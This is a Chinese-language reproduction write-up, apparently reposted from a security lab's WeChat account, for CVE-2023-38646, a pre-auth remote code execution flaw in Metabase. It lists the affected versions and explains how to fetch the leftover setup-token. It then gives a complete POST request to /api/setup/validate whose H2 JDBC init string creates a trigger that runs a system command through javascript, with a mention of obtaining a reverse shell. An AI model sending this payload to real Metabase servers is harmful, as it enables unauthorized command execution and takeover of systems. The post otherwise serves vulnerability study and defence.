Metabase是一款开源的数据分析和可视化工具,旨在帮助用户轻松地探索、分析和可视化数据。它提供了一个直观易用的用户界面,允许非技术人员通过简单的操作来创建和分享数据报表、图表和查询。
CVE-2023-38646
漏洞描述:
在Metabase 进行安装时,存在一个特殊的令牌setup-token,按照正常流程,在安装结束之后便会清除,但实际并没有正常的清理。攻击者获取到setup-token之后,就可以调用设置JDBC的接口进行利用。
影响版本:
0.43.0.0 <= Metabase open source < 0.46.6.1
1.43.0.0 <= Metabase Enterprise < 1.46.6.1
漏洞复现:
1.访问/api/session/properties获取setup-token
网页源代码中也会存在setup-token
2.命令执行
通过CREATE TRIGGER配合 javascript进行命令执行。
POST /api/setup/validate HTTP/2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Type: application/json
Content-Length: 753
{
"token": "7d28b736-xxxx-xxx7938",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascriptu000Au0009java.lang.Runtime.getRuntime().exec('ping dnslog')u000A$$"
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
DNSlog
反弹shell
原文始发于微信公众号(YongYe 安全实验室):CVE-2023-38646__Metabase-RCE复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论